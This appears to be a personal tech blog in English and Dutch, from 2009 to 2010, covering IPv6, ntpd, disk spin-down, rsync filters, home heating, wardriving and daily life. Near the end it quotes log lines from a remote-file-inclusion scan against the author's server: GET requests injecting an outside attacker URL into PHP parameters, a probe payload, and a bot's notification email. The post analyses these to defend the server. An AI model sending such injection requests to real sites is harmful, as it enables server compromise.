My very own security incident involving China (in a way):

[Jan 28 09:55:45] NOTICE[7593] chan_sip.c: Call from '' to extension '00442078420960' rejected because extension not found.

An attempt (within the public sip context) to call a number in England. The Chinese embassy in London. All attempts failed since the asterisk which logged that has no idea how to call the big phone network. Information from a lecture on SIP security suggests that this kind of attempts is a sort of ddos attack on a phone number.

I looked at the project sundial power calculations again and did some more calculations: even when I take the parts with the lowest energy usage and get the average usage down to 5.4 Watt, the investment in solar panels to get even through December and January in the Netherlands would mean it would take somewhat over a 100 years to 'earn back' the investment in the solar panels. So maybe it is a better idea to power the weatherstation from the grid and make sure the earth connection is really good to avoid damage to the power grid at home should lightning strike it. Still using wifi for data transfer would be a wise idea.
Update: About the same goes for wind power: because we live in the city and can't put up a 10 meter high pole for a wind generator the generator would become quite expensive.

Maybe IPv6 traffic will get another boost now: for participants in the Google over IPv6 program the records for youtube now have been added:

$ host www.youtube.com
www.youtube.com is an alias for youtube-ui.l.google.com.
youtube-ui.l.google.com has address 74.125.77.100
youtube-ui.l.google.com has address 74.125.77.101
youtube-ui.l.google.com has address 74.125.77.102
youtube-ui.l.google.com has IPv6 address 2a00:1450:8001::8b
youtube-ui.l.google.com has IPv6 address 2a00:1450:8001::8a
youtube-ui.l.google.com has IPv6 address 2a00:1450:8001::65
youtube-ui.l.google.com has IPv6 address 2a00:1450:8001::71
youtube-ui.l.google.com has IPv6 address 2a00:1450:8001::64
youtube-ui.l.google.com has IPv6 address 2a00:1450:8001::66

Video is streamed from cache servers like:

$ host v1.lscache1.c.youtube.com
v1.lscache1.c.youtube.com is an alias for v1.lscache1.l.google.com.
v1.lscache1.l.google.com has address 82.94.228.144
v1.lscache1.l.google.com has IPv6 address 2a00:1450:4001::10

All reachable via IPv6. I'm almost tempted to try to try to play a youtube video via a v6-only connection and see what breaks.

In following some links about 1-wire projects I found a German Supplier of 1-wire components which can be interesting: Fuchs Elektronik sells 1-wire components at a reasonable price such as the DS18B20 1-wire high resolution thermometer. Too bad they don't sell other interesting sensors like the barometer which could help in combining an order.

Wardriving results 14 December 2009 - 1 February 2010: 4450 new networks with GPS locations according to WiGLE. In the WiGLE stats I went to 13th place and passed the 180000 networks mark.

WiGLE also did a very nice upgrade: the new WiGLE wardriving maps are based on google maps.

We volunteered ntp.cs.uu.nl for extra capacity for the Turkish ntp pool, and the results are quite visible in the ntp.cs.uu.nl statistics. Suddenly peaks are near 5000 packets per second. But ntpd (and the freebsd kernel) deal with it without problems.

And I'm back from a snowboarding holiday in Fiss in Austria. A great wintersport area, connecting Fiss, Ladis and Serfaus. We had great weather, first sun and later snow, resulting in fresh powder for the last few days. Snowboarding in fresh powder is really great. I got some much needed rest too.

Tien jaar geleden haalde ik mijn rijbewijs (en gebruikte ik dus ook al newsitems op mijn homepage). Dus het was tijd voor vernieuwen. Ik kreeg daar keurig een brief over van de RDW maar die was met alle verbouwingsdrukte blijven liggen. Vorige week ontdekte ik dat 2010-01-10 geweest was en ik dus geen geldig 'roze papiertje' meer had. Snel voor pasfoto's naar foto boekhorst die prima pasfoto's volgens de huidige regels en toen naar de gemeente Utrecht voor de aanvraag. Ondertussen rond, dus nu is het 'roze papiertje' vervangen door een 'roze creditcard'.

I upgraded ntpd on ntp.cs.uu.nl from 4.2.4 to 4.2.6 and suddenly I notice in the output that this has changed the stratum from 2 to 1.

$ ntpq -c rv ntp.cs.uu.nl
status=011d leap_none, sync_atomic, 1 event, event_13,
version="ntpd 4.2.6@1.2089-o Fri Jan 15 14:31:14 UTC 2010 (1)",
processor="i386", system="FreeBSD/5.4-RELEASE-p13", leap=00, stratum=1,
precision=-19, rootdelay=0.000, rootdisp=1.456, refid=PPS,
reftime=cefb066f.cbe638ff  Fri, Jan 15 2010 16:21:19.796,
clock=cefb0693.889dd5ee  Fri, Jan 15 2010 16:21:55.533, peer=7047, tc=6,
mintc=3, offset=-0.001, frequency=15.448, sys_jitter=0.002,
clk_jitter=0.001, clk_wander=0.002

Which matches the peer list where the PPS stratum is now 0:

$ ntpq -c peer ntp.cs.uu.nl
     remote           refid      st t when poll reach   delay   offset  jitter
==============================================================================
*huygens.cs.uu.n .PPS.            1 u   23   64  377    0.197    0.009   0.258
+stardate.cs.uu. .PPS.            1 u   13   64  377    0.998   -0.058   0.033
+tijger.phys.uu. metronoom.dmz.c  2 u   15   64  376    0.599    0.004   0.185
 LOCAL(0)        .LOCL.          10 l  627   64    0    0.000    0.000   0.002
oPPS(0)          .PPS.            0 l   49   64  377    0.000   -0.002   0.002
 NTP.MCAST.NET   .MCST.          16 u    -   64    0    0.000    0.000   0.002

I guess some definition of PPS input has changed. Now I wonder how much more ntp traffic this will cause.

Het winterweer houdt nog steeds strak vol, en dus kijk ik naar mijn vervoersmogelijkheden. Met de gladheid gebruik ik zowiezo maar de rechtopfiets en niet de ligfiets, rechtop voel ik me dan toch iets veiliger. Ik vroeg me eerst af waar alle meldingen over gladheid op fietspaden in Utrecht vandaan kwamen totdat ik van de week naar iets anders wilde fietsen dan naar mijn werk in de Uithof. In de gemeente Utrecht worden alleen de fietspaden goed schoongehouden. Op zich een prima actie. Maar, er zijn daarnaast nog veel meer fietsroutes waarlangs zich dagelijks grote aantallen fietsers voortbewegen. Als die fietsroute toevallig een achteraf straat is waar geen doorgaand autoverkeer hoort te zijn dan zit deze ook buiten de routes waar schoongemaakt zal worden. Een erg duidelijk voorbeeld is te zien rond het Salvador Allendeplein in Utrecht: de fietspaden daar, onder andere langs de Kardinaal de Jongweg zijn prima geveegd. Maar de Troelstralaan, wat voor veel fietsers de route is naar de binnenstad is een ijsbaan.
Ik had graag een kaartje uit openstreetmap toegevoegd maar daar ontbreken nogal wat fietspaden in dit gebied. Projectje voor wanneer het beter weer is.

The new disk in the homeserver greenblatt was another case of a disk not wanting to go to sleep after the set period. Some searching found two answers: spindown, a daemon to monitor disks for inactivity and spin them down with sg_start --stop or hdparm -y. But the other answer was a better answer: hdparm standby timeout not working for WD raptors? has as answer:

* I also know of quite a number of drives where hdparm -B settings override the -S settings, even if you set the -S settings after the hdparm -B settings. You could try combinations with various values of hdparm -B, especially 1 and 255.

And the manpage of hdparm has this bit:

-B Set Advanced Power Management feature, if the drive supports it. A low value means aggressive power management and a high value means better performance. Possible settings range from values 1 through 127 (which permit spin-down), and values 128 through 254 (which do not permit spin-down). The highest degree of power management is attained with a setting of 1, and the highest I/O performance with a setting of 254. A value of 255 tells hdparm to disable Advanced Power Management altogether on the drive (not all drives support disabling it, but most do).

Default on the WD drives is indeed 128, which does not permit spindown on idle. I changed it to 127, see if that helps. I prefer it if the drives decide for themselves when to spin down.
Update : Yes, the changed advanced power management setting helps, now the drive spins down when not in use.

Vanmorgen via het centrum met de bus, met de ov-chipkaart. Behalve het privacy aspect is het namenlijk verder een handig systeem, al zouden sommige dingen handiger kunnen voor de reiziger als een en ander vanuit het perspectief van de reiziger was ontworpen.
Maar op een bepaald moment vielen de ovchip kaartlezers in de bus uit. De chauffeur was naast het rijden bezig met een touchscreen waar een status op rood stond. Blijkbaar is er toch communicatie met de buitenwereld nodig voor werkende ovchip kaartlezers. Uit de originele verhalen begreep ik dat bussen genoeg hadden aan een gps ontvanger. Opvallend is ook dat de automatische halte-aankondigingen van de bus het toen niet meer deed. Toen kon ik dus ook niet meer uitchecken bij het uitstappen, of de kaartlezer van een andere gvu bus gebruiken om uit te checken, want ik zag overal rode ledjes. Bij een volgende busrit in een bus waar de ovchip automaat niet werkte zwaaide ik dus maar even met de ovchip kaart naar de chauffeur die me zo doorzwaaide.
Maar nu heb ik dus een uitcheck actie gemist. Kijken of de restitutie actie daar ook voor werkt.
Update 2010-01-13: Restitutie geprobeerd: volgens de ov chipkaart restitutieformulieren (afgrijselijke deeplink binnen een framesite) moet ik een bonnetje uitprinten met de laatste 10 transacties:

Let op: stuur uitdraai mee van laatste tien transacties. U kunt een overzicht van uw laatste tien transacties uitdraaien bij de oplaad- en verkoopautomaten op metrostations en bij Verkoop- en Informatiepunten.

Alleen: waar doe je dat. Op de ov-chipkaart adresvinder kan ik geen vinkje aanzetten 'transactie overzicht uitdraaien'. Die in de Uithof bij de bibliotheek kan het niet, de automaat bij de GVU klantenservice in het centrum kan het ook niet, dan maar in de rij voor het loket van de GVU klantenservice. Waar ze een stapje verder gingen: ze konden gelijk de mislukte transactie repareren, waardoor ik het hele formulier niet meer nodig had.

The sensors at home are updated with data from the new disk. The cause of the relatively high temperatures is that 3 disks (2 pata and 1 new sata) are in one cage together. I hope to rearrange disks so the airflow improves and they cool better. I might need a bit longer sata cable to make that happen.

Work on home server greenblatt: time for less disks with more storage. So I bought two sata disks, one huge one to store the camera archive and scratch files, and one for the system and home directories. The choice for two disks is so the one with the camera archive and the scratch files can fall asleep when not in use, to save a bit of power. Installing both new disks at once wasn't going to happen due to space and cabling considerations so I started with the big one. When that one is done I can remove three pata disks from the system. I also updated the system bios to the latest version which made the system clock a lot more stable, ntpd now runs without having to use tickadj. Bios updates are easy these days: this bios can update itself from a USB stick. I chose logical volume management (lvm2) again for managing the big disks so it will be easy to expand storage when needed without getting a big tree of filesystem mounts.

Anybody know any leads in receiving data from a weather station which uses "instant transmission" on 868 MHz? I'd like to receive data from such a weather station. In linux, on the server. Some device which would receive the data and present it via a serial port would be great.
Update: the wonderful thing about standards.. I learned that there is no standard for data from weather stations on 868 MHz and that a sensor from brand A will not be received by a receiver from brand B. Time to be more specific: the weather station is a TFA-Dostmann "Stratos". I already e-mailed a technical contact at TFA-Dostmann about this.
Update 2010-01-14: Answer from TFA-Dostmann: it is impossible to receive the data from that weather station on a computer.

Yesterday during the meeting of the hcc pcgg netwerkgroep I saw something which I could not research at the time and it bugs me: one person had Windows 7 running and the network connections screen said "IPv4 Connectivity: Internet" and "IPv6 Connectivity: Local". But that is the wrong answer: Due to my work on the openvpn ipv6 tunnel there should be full IPv6 Internet access. So now this is bugging me and I'm trying to find out how exactly Windows 7 determines whether IPv6 is 'local' or 'Internet'. The system was on the wireless network and the connection just started to work so maybe IPv6 router announcements with a global IPv6 address were missing. Or maybe more is needed like a v6 nameserver.

The Netherlands, Vlieland with less snow
Image credit: NASA/GSFC, MODIS Rapid Response

More satellite image browsing: the Modis rapid response system image gallery offers a lot. Nice detail in the latest images showing the Netherlands such as the Aqua/Modis pass at 2010-01-08 12:45 UTC: Vlieland has a lot less snow!.

Image credit: NERC Satellite Receiving Station, Dundee University, Scotland

Interesting snow cover in the Netherlands, with more coming up. This satellite image from this morning shows a serious white cover and some clouds. The big rivers are visible as darker lines and the ice growth on parts of the IJsselmeer shows.

I tried to use the --filter option in rsync but I was a bit baffled by the syntax and the manpage is nice but I couldn't understand. I wanted certain directories completely, other directories default excluded and certain files in one directory but not all. After some trail and error and talking to the teddybear:

rsync -rvv --progress /home/koos/rsyncsource/ /home/koos/rsyncdest --filter='merge /home/koos/rsyncfilter'

And in the filter file name things to include and exclude:

+ /wel/
- /niet/
+ /random/file
- /random/*

And the result is what I want:

$ ~/bin/testrsync 
building file list ... 
[sender] showing directory wel because of pattern /wel/
[sender] hiding directory niet because of pattern /niet/
[sender] hiding file random/niet because of pattern /random/*
[sender] showing file random/file because of pattern /random/file
7 files to consider
delta-transmission disabled for local transfer or --whole-file
random/
random/file
           0 100%    0.00kB/s    0:00:00 (xfer#1, to-check=4/7)
wel/
wel/file1
           0 100%    0.00kB/s    0:00:00 (xfer#2, to-check=2/7)
wel/file2
           0 100%    0.00kB/s    0:00:00 (xfer#3, to-check=1/7)
wel/file4
           0 100%    0.00kB/s    0:00:00 (xfer#4, to-check=0/7)
total: matches=0  hash_hits=0  false_alarms=0 data=0

sent 319 bytes  received 126 bytes  890.00 bytes/sec
total size is 0  speedup is 0.00

Now to do this on a filesystem with 151000 files.

Google knows where your AP lives, and it's not that hard to query it! Geolocation API Network Protocol can work based on a query with one AP mac address. Testing it with a random access-point near work gives me: http://samy.pl/mapxss/?mac=00%3A1A%3A1E%3A15%3A90%3AE2. Found via Hacker pilfers browser GPS location via router attack - The Register where the user is not asked for permission to trace the location when a wireless router is used. And indeed: 'Scary how accurate it is'.

The year 2010 seems to be an unfathomable far future, I just found another Y2.01K problem. The zonecheck tool gives a warning which reads '2010 is not a valid year':

w> The format of the serial number is not YYYYMMDDnn
 | Ref: RFC1912 (p.3)
 |   The recommended syntax is YYYYMMDDnn (YYYY=year, MM=month, DD=day,
 | nn=revision number).
 `----- -- -- - -  -
 :   The serial 2010010502 doesn't seem to be in the YYYYMMDDnn format.
 `..... .. .. . .  .

And the code indeed shows:

    # DESC: recommanded format for serial is YYYYMMDDnn
    def chk_soa_serial_fmt_YYYYMMDDnn(ns, ip)
        serial = soa(ip).serial
        return true if (serial > 1999000000) && (serial < 2010000000)
        { 'serial' => serial }
    end

The far future is happening today.
Filed as Ubuntu bug #503501.

Nieuws maken kan ook prima in Nederland. Vanmorgen in het ontbijtnieuws en ook in de Volkskrant: 'Drankmerken redden imago met voorlichting’ met:

Producenten van alcoholische dranken die hameren op het verantwoord gebruik van alcohol, doen dat alleen om hun eigen imago op te vijzelen.
Dat stelt STAP, het Nederlands instituut voor alcoholbeleid

Nee, STAP is gewoon de "Stichting Alcohol Preventie". En dan is het ineens een stuk duidelijker waar deze mening vandaan komt. Een moderne uitvoering van de blauwe knoop dus. Maar als je jezelf een beetje neutraal benoemd als 'instituut voor alcoholbeleid' en mooie rapporten schrijft dan lijk je ineens geloofwaardiger en nemen het ANP en wat kranten je zwaar bevooroordeelde rapport over. Uit de categorie "wij van wc-eend adviseren wc-eend".

The well monitored heating system worked a lot better during the night, so the problems are fixed. Only the heater pump ran a few times which I think is part of the frost-protection. The isolation in our house is good: the living room temperature only dropped from 19⁰C to 16.8⁰C over the whole night while it was below 0⁰C outside.

Hot water system fixed: the 3-way valve controlling how the heating/boiler system heats water was broken due to calcium buildup. Now replaced and suddenly things work as expected again.

A day with temperatures staying below 0 ⁰C and the first working day is not the right day to call the heating company about a hot water problem. They sounded very very busy on the phone

More scientific research into the problems with the heater show that the sensor detecting hot water being used seems to be malfunctioning: the system starts for hot water use about every 5 minutes even when not a drop of water is used in the house. Time to call for a repair. I hope the company which does repairs to heating installations isn't too busy with problems due to the current temperatures, those are well below freezing at the moment.

Fireworks launch

The change of the year is celebrated in the Netherlands with fireworks, it is the one day per year all people of at least 16 years are allowed to light fireworks.

And I wish everybody reading this a great new year!

During all the work in the house some of the 1-wire temperature sensors were disabled and removed to avoid damage. Today I did some work on the house and re-installed them. The sensor in the living room is now installed inside the room thermostat so it's hidden and should give the same reading as the thermostat. I also re-installed the temperature sensor in the crawlspace which will show up in the sensors at home overview.

Ik heb toegegeven en voor mezelf een wikipedia account aangemaakt zodat ik de ontbrekende gegevens over de RTBF en VRT dvb-t uitzendingen kon toevoegen aan de pagina over DVB-T frequenties. Het blijft me opvallen dat deze informatie zeer slecht te vinden is. Dan maar wat extra google juice voor deze informatie : DVB-T guard rate, coding, error correction for VRT / RTBF Belgium.

Y2.01K problem: SpamAssassin had a rule since 2006 that e-mail with a date in the 'far future' was likely spam. The 'far future' was defined as 2010-2099. So today that rule started firing, leading to missed e-mail. Documentation for SpamAssassin Rule: FH_DATE_PAST_20XX. Time for an update there...

VLC can be a bit hairy to configure, but with some trial and error and a bit of google juice I found the right playlist file to instantly play radio2 from multiplex 1:

$ cat digitennemux1-radio2.vlc 
#EXTM3U
#EXTVLCOPT:dvb-adapter=0
#EXTVLCOPT:dvb-frequency=706000000
#EXTVLCOPT:program=1113
dvb://

Use with vlc --m3u-extvlcopt digitennemux1-radio2.vlc and enjoy the Top2000. Without the --m3u-extvlcopt vlc finds those commands scary.

Maandag was de Oliebollentocht 2009 van de NVHPV. Als rijder van een 'open' ligfiets mochten we niet meerijden maar we zijn wel op het Domplein en bij Vleuten gaan kijken naar het voorbijrijden van alle velomobielrijders wat natuurlijk zeer fotogeniek is. Op het Domplein was de 'foto-opportunity' waar ook pers voor uitgenodigd was. Mijn dag was ook weer helemaal goed: ik werd ook aangezien voor persfotograaf. Oliebollentocht 28 December 2009 foto's Koos van den Hout (speciaal voor Oscar).

Nog een paar zendmast foto's: tijdens onze ligfietsvakantie door Duitsland zijn we ook langs de Sender Höhbeck gefietst. Op 12 Augustus 2009 heb ik Sender Höhbeck met zendmasten Gartow 1 en Gartow 2 gefotografeerd. Toen ik thuis achteraf ging zoeken welke masten we gezien hebben stond er volgens de wikipedia pagina nog maar 1, na goed lezen bleek Gartow 1 op 20 Augustus 2009 opgeblazen te zijn. Aan deze zendmasten zat een hoop koude oorlog historie, ze onderhielden een televisie, radio en telefoonverbinding tussen West-Duitsland en West-Berlijn. Daarnaast was het ook de zender voor de ZDF in de regio waardoor deze 'toevallig' ook in een aardig stuk van de voormalige DDR te ontvangen was.

Nog wat foto's van de Gerbrandytoren: zo ken ik de Gerbrandytoren vanuit Nieuwegein van vroeger en de Gerbrandytoren als de grootste kerstboom ter wereld.

Meer bijgewerkte zendmast foto's: Zendmast Wieringermeer is uitgebreid met omschrijvingen van delen van de mast aan de hand van het FM Antenne hoogte overzicht van Radio en TV Zenders in Nederland.

Zomaar tijd gehad om uitgebreid zendtoren foto's uit te zoeken. Eerste resultaat, de foto's van zendmast Lopik te IJsselstein / Gerbrandytoren zijn uitgebreid met foto's van meer antennes en gegevens erover. Het was even zoeken maar met behulp van Radio en TV Zenders in Nederland en Zenders Lopik, IJsselstein van Hein ten Horn is de pagina goed bijgewerkt. Nu nog tijd vinden om wat foto's te maken van deze toren als de grootste kerstboom van de wereld want het is ze dit jaar weer gelukt.

Sommige mensen blijven zo dom om het e-mail adres van een ander in te vullen op een site om zo van eventuele reclame af te komen. Maar soms kan dat vervelende effecten hebben. Zo kreeg ik net een wel heel duidelijk verdwaald mailtje:

   Beste klant,
   U hebt een opwaardeervoucher besteld bij Lebara NL WEB Reloads op 22
   december 2009 15:00:23 CET.
   Als u deze opwaardeervoucher wilt gebruiken, belt u gratis naar 1244
   met opwaardeercode 27964964967133.

Maar dat heb ik helemaal niet gedaan. Ik denk dat er iemand nu heel boos probeert de klantenservice van Lebara te bellen.

Winter picture time:

Sparrow visiting the birdfeeder

The temperature sensor connected to the heater is working nicely and tells us the problem with the heater is only in the hot-water producing part.
And the picture is a nice update for the 1-wire projects page.

Toen ik aan het kijken was naar VPS hosting met IPv6 support kwam ik ook informatie tegen dat OpenVZ en IPv6 slecht samengaat. Maar Henk van de Kamer is er eens mee bezig gegaan en kwam er achter dat IPv6 onder OpenVZ prima aan de gang te krijgen is. Kortom: geen belemmering voor VPS aanbieders die OpenVZ gebruiken om ook IPv6 aan te bieden.

Ik was even aan het zoeken naar wat extra informatie voor mijn foto's van de zendmast Lopik te IJsselstijn / Gerbranditoren want ik wist van deze foto niet wat de antennes net onder de top zijn. Gevonden op Zenders Lopik, IJsselstein van Hein ten Horn (foto daar is van voor de ontmanteling van de Nederland 1 VHF zender): het zijn de antennes van Radio M op 93.1 MHz FM.

3FM Serious Request volgen in hoge kwaliteit? Dan heb je IPv6 nodig! De mensen van omroep.nl streaming hebben de Serious Request streams ook via IPv6 beschikbaar gemaakt en de 'main' stream is alleen via IPv6 op 3 megabit te krijgen.

Natuurlijk wil je IPv6, maar dit is een extra argument!

Stream URLs:
http://www.omroep.nl/live/ipv6/3fm_sr2009_main.asx <- Hoge kwaliteit via IPv6
http://www.omroep.nl/live/ipv6/3fm_sr2009_brievenbus.asx
http://www.omroep.nl/live/ipv6/3fm_sr2009_cam1.asx
http://www.omroep.nl/live/ipv6/3fm_sr2009_djcam.asx
http://www.omroep.nl/live/ipv6/3fm_sr2009_buitenshot.asx

Ik las vanmorgen in de Volkskrant dat 'Teletext' in Engeland er mee opgehouden is: 4e tussenkopje in dit artikel uit het betaalde archief van de volkskrant. Ik vond het al wat verwarrend omdat het ging over 'Teletext' terwijl de dienst bij de BBC 'Ceefax' heet. De schrijver van het artikel leek ook aan te nemen dat het over de BBC ging:

In Nederland is Teletekst onderdeel van de Publieke Omroep, terwijl de dienst in het Verenigd Koninkrijk zichzelf moest bedruipen met inkomsten uit advertenties.

Dit is alleen geldig voor de diensten van 'Teletext UK' die op de commerciële TV-zenders opereert. Ceefax is apart en wordt betaald uit de beruchte 'TV License' in Engeland.

Enfin, gelijk eens gekeken op BBC 1/2 en daar zag ik ook geen Ceefax meer. Ik ging er van uit dat iemand bij Ziggo het bericht ook niet helemaal gesnapt had en maar de hele zaak had uitgezet maar nu ik even zoek in nl.media.tv via google groups lijkt het er op dat het al veel langer uitstaat. Vreemd, ik dacht dat ik een paar weken terug nog het uitzendschema van Top Gear had nagekeken op BBC2 Ceefax.
Update 2009-12-17: Alleen pagina 888 (ondertiteling) doet het nog, wat overeenkomt met meldingen in nl.media.tv dat die ondertiteling uit de dvb ondertiteling komt (is apart van teletekst) en dan vervolgens als teletekstpagina 888 toegevoegd word aan het analoge signaal.

Snow this morning

Snow! And the associated traffic mess in the Netherlands.

We hung up a bird-feeder in the backyard last weekend and it is now very popular since it got cold the last few days, making for a few nice pictures this morning. They look a lot better at full size.

Sparrow in the backyard

Sparrow in the backyard

Our heating seems to be having problem, probably related to the changes recently. But to diagnose the problem completely we need to see what is happening. So one of the one-wire temperature sensors is now tie-wrapped to the output pipe of the central heating and measurements are logged.

Wardriving results 24 November - 13 December: 3026 new networks with gps locations. The wardriving box gets taken out again on some trips.

It's that xsnow time of year. I wanted to compile it for our students and staff to use and found a major Makefile and a real Imakefile (remember those?):

$ wc Makefile  Imakefile 
  957  2413 26799 Makefile
    7    21   172 Imakefile

Trying to find the 'real' problem I managed to reduce all that to:

xsnow: xsnow.o toon_root.o
        gcc -o xsnow xsnow.o toon_root.o -lm -lXpm -L/usr/X11R6/lib

imake gave us somewhat overkill Makefiles...

De schilder had de cat6 connectoren meegenomen (zonder afplaktape erover) dus ik heb de nodige verf er uitgepeutert en daarna connectors aan de kabels geknepen om ze te testen en gelijk te labelen. Gelukkig werkte alles op gigabit snelheid zonder fouten, maar ik denk niet dat er in de Category 6 specificaties ruimte is voor verf in de connector.

So Google announce their public DNS servers. First thing I try:

koos@greenblatt:~$ dig +short @8.8.8.8 www.google.com aaaa
www.l.google.com.

Too bad! Do they support AAAA records at all?

koos@greenblatt:~$ dig +short @8.8.8.8 idefix.net aaaa
2001:888:1011::694

Yes. But according to the FAQ item on IPv6 it does not support IPv6 as transport at all. Weird for google to roll out a new service so close to the network and not support IPv6.

I follow the comic strip Questionable Content and the latest character added Cosette is promising to be a lot of fun.

Vandaag heb ik voor het eerst gekookt in de nieuwe keuken. Dat is genieten, een goeie inductie-kookplaat in plaats van camping-branders.

Vandaag is de nieuwe keuken geinstalleerd waarmee het ineens erg mooi uit gaat zien. De foto's van de verbouwing zijn bijgewerkt.

After finding shortcomings in the verification by openssl s_client I tried the gnutls command-line client gnutls-cli. The upside of gnutls-cli is that it does use IPv6 when available. But.. gnutls-cli decides not to trust a server when using the same certificate set as used in testing openssl s_client.

~$ gnutls-cli --x509cafile /etc/ssl/certs/ca-certificates.crt -p imaps imaps.cs.uu.nl
..
*** Verifying server certificate failed...

versus

:~$ openssl s_client -verify 10 -CAfile /etc/ssl/certs/ca-certificates.crt -connect imaps.cs.uu.nl:imaps
..
    Verify return code: 0 (ok)

Weird. I would not be completely surprised when my own root CA had issues in very strict utilities but the chain used for the work servers is very well tested.

De winnaars van de IPv6 awards zijn bekend gemaakt vanmiddag:

Categorie ISPs: BIT

Categorie bedrijfsleven: Watchmouse

Categorie publicatie: Arnout Veerman

Categorie onderwijs: Hogeschool Utrecht en Universiteit van Amsterdam

Categorie particulieren: Jasper Wonnink

Door diverse sponsors zijn mooie prijzen beschikbaar gesteld. Persbericht IPv6 taskforce over de awards (PDF)

Zelf ben ik dus buiten de prijzen gevallen. Maar veel belangrijker is dat dit weer aandacht verzorgt voor IPv6. De uitreiking was onderdeel van het jaarcongres ECP-ECN en daar heb ik mensen uit diverse branches gesproken die nu door beginnen te krijgen dat IPv6 een onderwerp is om rekening mee te houden. Voor de meesten is alles 'netwerk' of 'Internet' maar die moeten er toch rekening mee houden dat dat 'Internet' wel aan het veranderen is.

I like my SSL verification tools paranoid, and it seems openssl s_client -verify isn't paranoid enough. The man page reports:

BUGS

       The -verify option should really exit if the server verification
       fails.

I'd like added "the hostname in the certificate is not verified". I ran a little test server to test for the right way to configure the SSL certificates in openldap server and noticed I got the verification to work even when I was connecting to the wrong name.

Met een folder over het tatoeëeren van je burgerservicenummer keurig in de stijl van andere folders van de overheid (PDF formaat) vraagt Het Nieuwe Rijk aandacht voor de opslag van vingerafdrukken.

Uit de beweegredenen van deze groep:

Het verbaast niet dat de aanleg en gebruik van deze vingerafdrukkendatabase op gespannen voet staat met het grondrecht op privacy, zoals vastgelegd in artikel 10 van de Nederlandse Grondwet en artikel 8 van het Europees Verdrag voor de Rechten van de Mens. Ook het College Bescherming Persoonsgegevens (CBP), verschillende onderzoekers, hoogleraren en deskundigen op het gebied van informatica, rechtspsychologie, computerbeveiliging en zelfs de Europese Toezichthouder voor Gegevensbescherming hebben zich zeer kritisch uitgelaten over deze ontwikkeling.

De Nederlandse regering wil het doen lijken alsof zij deze database op grond van Europese wetgeving aanlegt. Maar dat is niet het geval.

Opvallend is hoe in de reactie van het ministerie van binnenlandse zaken en koninkrijksrelaties alleen ingegaan wordt op de folder en de eventuele misleiding. Deze reactie is gepubliceerd toen de makers van de folder en het onderwerp waar aandacht voor gevraagd wordt nog onbekend waren, dus misschien komt daar nog verandering in.

Ik hoop dat de ophef over de verwijzing naar de holocaust niet teveel af zal leiden (of misbruikt zal worden om af te leiden) van het onderwerp waar het over gaat: de ongeoorloofde opslag van vingerafdrukken.
Update : Ook in de tweede reactie van het ministerie van binnenlandse zaken en koninkrijksrelaties wordt absoluut voorbijgegaan aan het doel van de actie. Op zijn minst is het jammer dat ze daar niet op ingaan. Ondertussen stromen de ondertekeningen van de petitie tegen de opslag van de vingerafdrukken binnen.

I was replacing ssl certificates on a lot of servers and got it working everywhere except on our ldap server. The SSL certificate chain wasn't given out so there was no link between a trusted root and the certificate on the server. I had it configured:

TLSCACertificateFile /etc/openldap/ssl/cacert.pem
TLSCertificateFile /etc/openldap/ssl/servercrt.pem
TLSCertificateKeyFile /etc/openldap/ssl/serverkey.pem

With the certificate in servercrt.pem and the intermediate certificates in cacert.pem. But that was a config from an older server which uses OpenSSL, including openssl libraries (libssl). The newer ldap server uses the gnu tls libraries (libgnutls) which really need:

TLSCertificateFile /etc/openldap/ssl/servercrt.pem
TLSCertificateKeyFile /etc/openldap/ssl/serverkey.pem

With the server certificate and the entire chain together in servercrt.pem. Something to keep in mind, so I documented it on our internal wiki.

Wardriving results 28 September - 23 November: 1831 new networks with GPS locations. Not much wardriving happening due to the construction work at home.

I realized there is one piece of software running on my server which has a small chance of having a known leak because it is a widely used package: Serendipity powers the hcc!pc gg netwerkgroep website and I hadn't upgraded it recently. A very small chance, since security is a very important part of the Serendipity design. Since upgrading phpBB for Camp Wireless was always a royal pain in the behind I sort of postponed this process. But after the serious search for any security flaw in my website I searched on the Serendipity site for an explanation of the upgrade process. And the answer: upgrading Serendipity is very, very easy. More PHP applications should be this easy to upgrade.
Update: A frequent reader notes that I had a bit of a strong opinion: lots of PHP software is easy to upgrade, phpBB is/was just a problem because the templating system is too integrated in the source.

Somebody in Denmark thought something in this webserver would run some default and vulnerable software and tried to find a hole:

$ grep -c 90.185.249.111 ~httpd/idefix/logs/access_log
4208

All tries to display http://www.spotmerkezi.com/cache/id1.txt which is a bit of PHP source:

<?php /* ZFxID */ echo("Shiro"."Hige"); die("Shiro"."Hige"); /* ZFxID */ ?>

Which will display ShiroHige as one word when run through the php processor.

All urls are attempts where it is assumed some vulnerable script is behind some visible part of the site such as the root, or my homepage, or some part of my homepage. Samples:

GET //?mosConfig_absolute_path=%0Dhttp://www.spotmerkezi.com/cache/id1.txt??
GET /~koos//?mosConfig_absolute_path=%0Dhttp://www.spotmerkezi.com/cache/id1.txt??
GET /~koos//administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=%20%0Dhttp://www.spotmerkezi.com/cache/id1.txt??
GET /~koos/newsitem.cgi//?mosConfig_absolute_path=%0Dhttp://www.spotmerkezi.com/cache/id1.txt??
GET /~koos/newsitem.cgi//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=%20%0Dhttp://www.spotmerkezi.com/cache/id1.txt??
GET /~koos/newstag.cgi/security%20%20//libraries/pcl/pcltar.php?g_pcltar_lib_dir=%20http://www.spotmerkezi.com/cache/id1.txt??
GET /~koos/newstag.cgi/security%20%20//templates/be2004-2/index.php?mosConfig_absolute_path=%20%0Dhttp://www.spotmerkezi.com/cache/id1.txt??
GET /~koos/newstag.cgi/security%20%20//modules/mod_weather.php?absolute_path=%20%0Dhttp://www.spotmerkezi.com/cache/id1.txt??

A bit of research finds that the next bit of code to execute would try to get info on the php setup (os, rights, free disk space). The third bit is running an entire bot with a few backdoors. I tried to find where the backdoor would connect to but that is all dynamic, only when the third script is loaded via the vulnerability a number of variables are set with the IP and port to connect to.

Like any good bot, it also notifies its maker in a hidden away part of its source, which would look like:

To: feelcomz@gmail.com
Subject: Fx29Shell http://server.name/vulnerable.url by 10.2.1.1

Boss, there was an injected target on http://server.name/vulnerable.url by 10.2.1.1

Searching on the term Fx29Shell gives a scary answer: Results 1 - 10 of about 221,000 for Fx29Shell. a lot of those still showing webservers where this script is active.

But all my home-made webstuff is not in the habit of executing remote php scripts. But given the load of sites hosted on 90.185.249.111 it's probably a script running on that server which got hacked from a third place.

I'm building a new box at work and I waited a bit with ratelimiting ssh connections (ssh is already configured to only allow valid accounts with pre-established keys). The result of one night..:

